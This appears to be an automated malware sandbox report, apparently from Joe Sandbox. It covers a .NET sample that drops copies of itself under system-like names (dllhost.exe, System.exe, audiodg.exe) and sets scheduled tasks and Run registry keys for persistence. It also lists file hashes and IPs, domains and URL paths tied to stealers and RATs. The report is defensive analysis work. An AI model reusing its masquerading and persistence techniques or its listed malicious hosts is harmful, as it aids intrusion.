Execution Graph export aborted for target dllhost.exe, PID 7264 because it is empty
Execution Graph export aborted for target mnUYCZffXdEgQlZPiczLektp.exe, PID 7304 because it is empty
Execution Graph export aborted for target mnUYCZffXdEgQlZPiczLektp.exe, PID 7316 because it is empty
Execution Graph export aborted for target mnUYCZffXdEgQlZPiczLektp.exe, PID 7388 because it is empty
Execution Graph export aborted for target mnUYCZffXdEgQlZPiczLektp.exe, PID 8092 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:01:59	Task Scheduler	Run new task: audiodg path: "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
04:01:59	Task Scheduler	Run new task: audiodga path: "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
04:01:59	Task Scheduler	Run new task: dllhost path: "C:\Program Files (x86)\windows defender\dllhost.exe"
04:01:59	Task Scheduler	Run new task: dllhostd path: "C:\Program Files (x86)\windows defender\dllhost.exe"
04:02:00	Task Scheduler	Run new task: mnUYCZffXdEgQlZPiczLektp path: "C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe"
04:02:00	Task Scheduler	Run new task: mnUYCZffXdEgQlZPiczLektpm path: "C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe"
04:02:00	Task Scheduler	Run new task: ShellExperienceHost path: "C:\Users\Public\Downloads\ShellExperienceHost.exe"
04:02:00	Task Scheduler	Run new task: ShellExperienceHostS path: "C:\Users\Public\Downloads\ShellExperienceHost.exe"
04:02:00	Task Scheduler	Run new task: System path: "C:\Recovery\System.exe"
04:02:00	Task Scheduler	Run new task: SystemS path: "C:\Recovery\System.exe"
04:02:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Recovery\System.exe"
04:02:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
04:02:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp "C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe"
04:02:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost "C:\Users\Public\Downloads\ShellExperienceHost.exe"
04:02:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files (x86)\windows defender\dllhost.exe"
04:02:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Recovery\System.exe"
04:02:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
04:02:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp "C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe"
04:03:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost "C:\Users\Public\Downloads\ShellExperienceHost.exe"
04:03:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files (x86)\windows defender\dllhost.exe"
04:03:23	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Recovery\System.exe"
04:03:32	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
04:03:40	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp "C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe"
04:03:48	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost "C:\Users\Public\Downloads\ShellExperienceHost.exe"
04:03:56	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files (x86)\windows defender\dllhost.exe"
22:01:56	API Interceptor	1x Sleep call for process: dllhost.exe modified
22:02:01	API Interceptor	8x Sleep call for process: mnUYCZffXdEgQlZPiczLektp.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.8.192.93	qWBySdk8Ng.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	a1044611.xsph.ru/red.png
	EC09B2C859DB05F126FE206DFBC586FCDE34D15994660.exe	Get hash	malicious	DCRat, zgRAT	Browse	a0853356.xsph.ru/phpBigloadDefaulttrafficdleLocalTempCentral.php
	file.exe	Get hash	malicious	LummaC Stealer, SmokeLoader	Browse	a0890677.xsph.ru/uscat.jpg
	file.exe	Get hash	malicious	LummaC Stealer, SmokeLoader	Browse	a0890677.xsph.ru/uscat.jpg
	2277d35849e73c839852026e23cf324a1c7bdae27bd5f399ee2ca01781924b7e_dump.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse	a0890677.xsph.ru/246.jpg
	file.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse	a0890677.xsph.ru/246.jpg
	file.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse	a0890677.xsph.ru/246.jpg
	file.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse	a0890677.xsph.ru/246.jpg
	rskovbrand.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.myonlinesuccessway.com/hsr8/?n1dvdQZ=uOpwb2pyOlkoIcna/lAblz9uGOir0u4LWASThqDsOp9I9KB9Cp5ifAj0k/6CE2+wHOotNXrdEG768kx3WpIDlqSOgMjizUFtyA==&as=7R3er1099g3N
	7SzUgdO8Ne.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.myonlinesuccessway.com/hsr8/?TM=W9TuRF0wi&ph9H6u=uOpwb2pyOlkoIcna/lAblz9uGOir0u4LWASThqDsOp9I9KB9Cp5ifAj0k/6CE2+wHOotNXrdEG768kx3WpIDlqSOgMjizUFtyA==

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINTHOSTRU	http://blacksaltys.com	Get hash	malicious	Unknown	Browse	185.251.91.157
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	141.8.199.217
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	141.8.199.217
	hFMz07E5ot.exe	Get hash	malicious	DCRat	Browse	141.8.194.149
	qWBySdk8Ng.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	141.8.192.93
	wilde.exe.bin.exe	Get hash	malicious	XWorm	Browse	141.8.194.149
	tbV4Eq8GjP.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	h9a6S63Ytv.exe	Get hash	malicious	DCRat	Browse	141.8.192.126
	20240930_185453_p1uYhraXAa8FqoQDzs1lqwv0Fp3NVQrL.eml	Get hash	malicious	GRQ Scam	Browse	141.8.192.26
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	185.185.71.79

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	121
Entropy (8bit):	5.627096604846512
Encrypted:	false
SSDEEP:	3:zJUilm0gPQQ0fU+SbmJREnXulgvIqcMaS:zaiM0vHU+kmJRE+rBMJ
MD5:	6A0A4D4B2405CD27AFAB37D8461B48B6
SHA1:	36BE85AFAA6D0B735EFA323DFF58DBCBB1F62BD5
SHA-256:	8F52E8CB6E34596491C550A00139780514B22C76DD22E2F36E05725E92E09779
SHA-512:	94DFE34B8C19A1F9B60DFB7FE83BD034329EA3C0EE0FEC359E65E1A8100A517DD4F48380D476E2B0C9548692876F0FA9129B1A1E874AADDBD930E77D3CE1282D
Malicious:	false
Preview:	HWrJt3ovQ15R7sbOLP79mj5zqX0DBVu3YjpZIYUXLBEplBFCzqHigIeia1cVClt4GB2YDCGw4kxlfPOoSxOVOLWPFG8Q69UkRJijIr9wjUn6V2DLmyDPXXq5o

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1444352
Entropy (8bit):	7.155494594590181
Encrypted:	false
SSDEEP:	24576:6oIREGQw97lGTIYskQyxNtGSKERqWzAcqGv+3spCElJz009I+LU:gRdGcHkBxNYARdzAcqGv+cphlJzxV
MD5:	181D043C0617914801548F09D5B776D4
SHA1:	757F042065A3DC2C9F73E635B41F83591C8AD647
SHA-256:	501AA5F94B15B8716EF7F76E2DBDC146B436CD9E72274D6EC5DEC7265706C0AD
SHA-512:	C56897C04B11DB7C09EF21BE8FE6A541C3C9FFB428B3E1340FCE5B035F9F74BB133B57E7CC0852730EFD20B4A49DA0E8A79B6390F105D18F9FB39461559BE574
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................................@.................................`...K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\Mozilla Maintenance Service\logs\42af1c969fbb7b

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with very long lines (551), with no line terminators
Category:	dropped
Size (bytes):	551
Entropy (8bit):	5.866190993116442
Encrypted:	false
SSDEEP:	12:7CDUVhXsLg8wWVo9Qbzk9DX9+ugAxSqNqCbPoxVw1mbqaBg5HQGom:7CDU/sMMa9QbIaurwOQHHBQwGom
MD5:	11C1A1667C0CE800DDBCCAA819D66E26
SHA1:	7A393652F1A49CF9196D3BE013945C8256B5D037
SHA-256:	29FDD08511045E159A29E3DD7B61596FE819B6562EE62BB5CDDF04FD8CCF375D
SHA-512:	79D360F46FDBF5CFCC4AD391B3545B63D7475B978B6004673F0BAF387171E6135B9A7B81AA3338637C775FCEA7A479496D63C96FD8689830ABD93602BEA23766
Malicious:	false
Preview:	qZbOXA00aybGGJFbfRYpA9zBdLrNf9Wh2106giQ8wTaKNxSAl0IMEThrjZuLSmVab4NPSI46Ba2ripyq3rmo0KciUJXGxEpK7AsTjDrc6MLobzI4lESkArjRbo4IvxI6usti6eHz9Jso9xHeBcftwEJQab15IiqIEO4sGj7H6dl084RohaHTSYKpicIfmLqadkku3YYbeYwTdSRfJNYsbXzpEOJnbcevwKXYUhuICpy4l1LQLmVZx89Fv4qoOuAC3BgT53KmdPqwj4DNC3czGF7yKSnZ1F3RpvAkU2URbt5iSNf01clUSL5yEsImPvuXVZHx4d3KiKXXJZg7wxiYdi8d0LfltsBq8iM2Gr6XjbvIxhpoML0cMW3wan7s7Ra0IrYlMn1F0LzCw0qSg0Zi2jdmoZcduOZRA59GJEcjUulBg19k6pMH128jNv6xKXVmvhB10jJbY0OH7cGwZ2gEBSaH6a3XHoY6Z9P9zHtWgusBo1mupKXS1QkdH45aqvTubRr7NG6RJJiRjYdExIr7QGFJYv15MSqub8kWKog

C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1444352
Entropy (8bit):	7.155494594590181
Encrypted:	false
SSDEEP:	24576:6oIREGQw97lGTIYskQyxNtGSKERqWzAcqGv+3spCElJz009I+LU:gRdGcHkBxNYARdzAcqGv+cphlJzxV
MD5:	181D043C0617914801548F09D5B776D4
SHA1:	757F042065A3DC2C9F73E635B41F83591C8AD647
SHA-256:	501AA5F94B15B8716EF7F76E2DBDC146B436CD9E72274D6EC5DEC7265706C0AD
SHA-512:	C56897C04B11DB7C09EF21BE8FE6A541C3C9FFB428B3E1340FCE5B035F9F74BB133B57E7CC0852730EFD20B4A49DA0E8A79B6390F105D18F9FB39461559BE574
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................................@.................................`...K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\Windows Defender\5940a34987c991

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with very long lines (762), with no line terminators
Category:	dropped
Size (bytes):	762
Entropy (8bit):	5.900404415845894
Encrypted:	false
SSDEEP:	12:84Oy0An6XcX7ISSs7WgAq81gL1gs5iMApnhzHp4aQdfhjEUn6/SLn9D0YH8ndf7f:Ft0aapBw8yLr5i7HpSZgU6qLtBkdwL3K
MD5:	75D173305E5F6A9654BEF080222A212E
SHA1:	D11111652BD2EDD06B9DE5C5C089BCC36AD1030D
SHA-256:	68875C4B65C07267EBD9E72B13C450B311703597CA1D2C7A64F90D4E42F22FD9
SHA-512:	8EEF94E9BD007FB3AA1DF946FF18158C18030FDFC8B0F12F20CEA3DF2AE5268A882937D399F93A993FE8C2886E336ED3D31F4B7B15D483B119F3AA25C7FC93C0
Malicious:	false
Preview:	b65EMoB3QghK6cuQx2RUc4cdYNc2P8kmFjR4ajZpBxyuMBjn9HKW0RSgecp9MJoS55EXLz0OclSpFsQXoy3HyNvyRuZ83ad2IgyR6LcJR53O8mawLSVXQgdsJQFaa1UCIagj48acVt02UhzpUnwlFGlmDFIpGCtZl0GiF12M12BgpkXmbaFwEt7Cy4gy0vVTAbRdaRkdvktMEF7csgOq76U23EtLUEWGhsfOT4LKzmBe9v7t6EFUgpWEGZjVhZIqOnoVjtIxUE0U5z2IG9OQ8Bj2WbH4UzmadUQWGmKN5SAcyBIRgbPhK1sMDw9HlOcebZ1kjgCezAVqBHDVTzX3kEQlmDSTmClrzfAYJhs9YusKgCL5soyv0i4WJP8fOs1xYo0gHpLvHXezWFFj2Wl8Nz0QknP3jMvq34v2MpyDcDocDEAEKZm1H3kixj5daRM5my6cTNXNhhfJLYMgnKtJj4j9TNFmtVnL1s0PHhu7BZUjXaXYWY0PhCVrP6IGHudM4URci7YFawIKk9m30qQUfYnzXI9LZnzQ5HoDI40ZAuyv3LHPUPQbeIrgqcFZ7Nqw61OcUiu5z0Uuj25LAt0JXXvxaIXqyabxECyC7p5vfUloy66yh3ZNXgYiFbBMLDGZZhphD2OUyEoDwH8eLiJ5BNainQ6goskbNMOQQZvooFYS1Vw7chAm4LYLHH3x6spGeNzj3rNwxeQ6zHrRd9DHs7gCyDJJf7s5ZSyogMEuTOzZ4cW9amT6piXgqx

C:\Program Files (x86)\Windows Defender\dllhost.exe

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1444352
Entropy (8bit):	7.155494594590181
Encrypted:	false
SSDEEP:	24576:6oIREGQw97lGTIYskQyxNtGSKERqWzAcqGv+3spCElJz009I+LU:gRdGcHkBxNYARdzAcqGv+cphlJzxV
MD5:	181D043C0617914801548F09D5B776D4
SHA1:	757F042065A3DC2C9F73E635B41F83591C8AD647
SHA-256:	501AA5F94B15B8716EF7F76E2DBDC146B436CD9E72274D6EC5DEC7265706C0AD
SHA-512:	C56897C04B11DB7C09EF21BE8FE6A541C3C9FFB428B3E1340FCE5B035F9F74BB133B57E7CC0852730EFD20B4A49DA0E8A79B6390F105D18F9FB39461559BE574
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................................@.................................`...K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows Defender\dllhost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\USOShared\Logs\f8edc2df584126

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with very long lines (436), with no line terminators
Category:	dropped
Size (bytes):	436
Entropy (8bit):	5.860880961543517
Encrypted:	false
SSDEEP:	12:3Q0X39xSIFDdkNfoYXg3KQyiRcAmgr0f1UYVyLejl1SBMBYjgq+:3vn9xSIJoRw68c7gr0tHUMK+
MD5:	2B1EF1B518A0CB3B8376A197E6B9EB0C
SHA1:	7A9124373C1C962D79C4D6D01B7A6C297178521B
SHA-256:	A80428C81AAF0406AD15D3AFEFBF7EE18928438A87961BB09F670202E412506C
SHA-512:	839AF255154181BB48B68E7F5EAB329D5912FA679C17A63ACF8618F5F29D1E0C1D06C5DCA7796440CCEAAF7775083AA24A391E211BC8DFFAF1A03C15E40DDDAE
Malicious:	false
Preview:	0nhDWdVMhjcOBF1dy0lyG4JmItL7XcE1IeVpIrEfOJmEEULARO2dS4T6d54mRXzFfkFgtMUHvFj6REhyiKqIjkiOKZLMwcN0UhjdOpRF4vsNVXoYYFEHrrf4C1VUAIUT2smufDk23kOx2V3xvxyrXFJmBpbWT6EvbZVmu33UfLOHdrCq8ijNTn5wj9s0mNj6fcWcAQC13dLM1CJUmuYvX1byeiDuKDsRmSlBVjqrfrT0bs4h0YN1zxioAh8bNRq0v4jjaI8DEqQqhlWvnf4wz1byt7AxlPeNBdFgJVGsaKwJh2GYKNxrX4A3cvzdHKczLDoEg0mSZMWpESQ10mmXbxzGcLDXfnlPr77eNC2UleSLiUzKe8neiEXYNhmUwOwwkG7GUwnytSw6eoiHV33gAGrnkjQpZhiWrgkbXt0rVyvPRa3i9e83

C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1444352
Entropy (8bit):	7.155494594590181
Encrypted:	false
SSDEEP:	24576:6oIREGQw97lGTIYskQyxNtGSKERqWzAcqGv+3spCElJz009I+LU:gRdGcHkBxNYARdzAcqGv+cphlJzxV
MD5:	181D043C0617914801548F09D5B776D4
SHA1:	757F042065A3DC2C9F73E635B41F83591C8AD647
SHA-256:	501AA5F94B15B8716EF7F76E2DBDC146B436CD9E72274D6EC5DEC7265706C0AD
SHA-512:	C56897C04B11DB7C09EF21BE8FE6A541C3C9FFB428B3E1340FCE5B035F9F74BB133B57E7CC0852730EFD20B4A49DA0E8A79B6390F105D18F9FB39461559BE574
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................................@.................................`...K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\27d1bcfc3c54e0

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with very long lines (571), with no line terminators
Category:	dropped
Size (bytes):	571
Entropy (8bit):	5.873462295320195
Encrypted:	false
SSDEEP:	12:mDBQXzBHq3c+kY/DggnABKKUAtTYSDZcewW/4Oz95rR:mDaX1HqsZY7ggABKpAtTYgiej/4g951
MD5:	F251392BFC42976D9541288EA02B1DB4
SHA1:	D675C54CD3311024350CF47A720C412040CFF9F1
SHA-256:	A65481ED6FAE2424D8D1EC66545483652326B6D51FEBCA7280C73953FFE4BAB0
SHA-512:	D399F5EF5EA76D20A31B45D850DFC3CE9C7E591F2E12C416C65F26EC7D877A9F5AF70213DEB794D4FCD431678CCD2A1C0289F7FD1C4F56F8EB5C7C1417E17170
Malicious:	false
Preview:	2xRtyN8hWU6gGUP39Pjq4lEFN0vw97krjAUNwBktowEGDKzREK9RGAoRtMg8bMhYuP7FABH7o0CHh7BDAerz8TkiVCejfmSbOpWyMuQDDBnQ8htvLc76esaboYt7ghcCik31lM0QOow6pUkyTsYCpV7gP5JxASgfjlsYn2K8mqr05dvUy4oyIZWMmXlqCCQ6HQWElMLaiZa8oHlvJz9FnsXKOgvQQe5javsoGqsltOPs8YifvzgNCKTZ3M0Fa4JEd1h2Z6pdGYWYcoLz8Qea8sgQcSv3znKyFLOH0pGzKCHox46PBBHKasGvURaGLvodNhTRZE9SJoQ5l1ciWg2yf9YWFdwjPAoZYobPkpz6CyBvcKKdy2up2z7NJ7M6RaDJA1g6aM7qq6wr8m44STuXQ9giqNGnc3olv1uknNDm4D86DPOgCSn8pq3BU7PMGTOxRK6H2TQFPIcNAkfb8jkKQq6E7tQq70flyLp2THotBhshOqAubyOgsDglO1JICkHZm0Yz4nH150Is7Y0RtfOJl82voEoc8fqbaT5XSLzyrXl24xnzA1ZhW8xn8nK

C:\Recovery\System.exe

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1444352
Entropy (8bit):	7.155494594590181
Encrypted:	false
SSDEEP:	24576:6oIREGQw97lGTIYskQyxNtGSKERqWzAcqGv+3spCElJz009I+LU:gRdGcHkBxNYARdzAcqGv+cphlJzxV
MD5:	181D043C0617914801548F09D5B776D4
SHA1:	757F042065A3DC2C9F73E635B41F83591C8AD647
SHA-256:	501AA5F94B15B8716EF7F76E2DBDC146B436CD9E72274D6EC5DEC7265706C0AD
SHA-512:	C56897C04B11DB7C09EF21BE8FE6A541C3C9FFB428B3E1340FCE5B035F9F74BB133B57E7CC0852730EFD20B4A49DA0E8A79B6390F105D18F9FB39461559BE574
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. ....................................@.................................`...K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........@......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\System.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Default\OneDrive\f8edc2df584126

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	ASCII text, with very long lines (446), with no line terminators
Category:	dropped
Size (bytes):	446
Entropy (8bit):	5.861968460896424
Encrypted:	false
SSDEEP:	12:VjXDBP9oVjL21zAAsLJsvKyTQxwe5Ii6eUz+LVED:JTBPUL2ZbvKK2wKIi6x8ED
MD5:	519135B40F92BC03F0A1D1FA58924C4E
SHA1:	EA47DF065ACFEE1E34C1396D0CADA63CFE324288
SHA-256:	FDD5F509CDED854BEB5DF18768106B72739A47337B89681E7C45D193B3634C96
SHA-512:	8DE8A4B2A2D74BB6420ADD42B9ADBB1AEDF3B77E8924D3FCFB4C8246F433FB6643563B768F284329882571B34AA08D87D95C45D1674F5AFD803F9660A34463C2
Malicious:	false
Preview:	w4ia4NDxnH5FN3cn4fYDttdrrHire7Scb5lwXOsF2QMsAJAa3DuAMusDa0sxoVSpzdoRSqQqwTKcgurhGIybNSPqNiVgf5bh8g3hfsHMwDN3kPgpILqfh1chN8EtUtL01ne91KCYAloJEWF7BqXUP59GEWUhoY2C2WB7vhy8ISf5MSc02GsoW0l6nX5f0ftmtmRrUILe1ZL7aD4v3dohpNqBvFTXlTIni2MkBufu5Nw6pngjdJlW0L6f5P6Pyx2iRhZi1TuI74mcbtWIju4crvwW5qpvyQ5HUOpHO8sJYdZ6jeEL3yqE3a1fvCmLo8Ur8fHMEO3kCuDOW0xald2Aj1O3XJWLVgfaJs7EX1Go4FCIXmJ4PLjLFTHHRNz42sPfPnEo3sDtWOGdyFguAb6J6UUzkzxJBMvM0h3uifBhIzy1NnSLrF4avFi5TPDD53

C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe

Download File

Process:	C:\Users\user\Desktop\4KjLUaW30K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1444352
Entropy (8bit):	7.155494594590181
Encrypted:	false
SSDEEP:	24576:6oIREGQw97lGTIYskQyxNtGSKERqWzAcqGv+3spCElJz009I+LU:gRdGcHkBxNYARdzAcqGv+cphlJzxV
MD5:	181D043C0617914801548F09D5B776D4
SHA1:	757F042065A3DC2C9F73E635B41F83591C8AD647
SHA-256:	501AA5F94B15B8716EF7F76E2DBDC146B436CD9E72274D6EC5DEC7265706C0AD
SHA-512:	C56897C04B11DB7C09EF21BE8FE6A541C3C9FFB428B3E1340FCE5B035F9F74BB133B57E7CC0852730EFD20B4A49DA0E8A79B6390F105D18F9FB39461559BE574
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
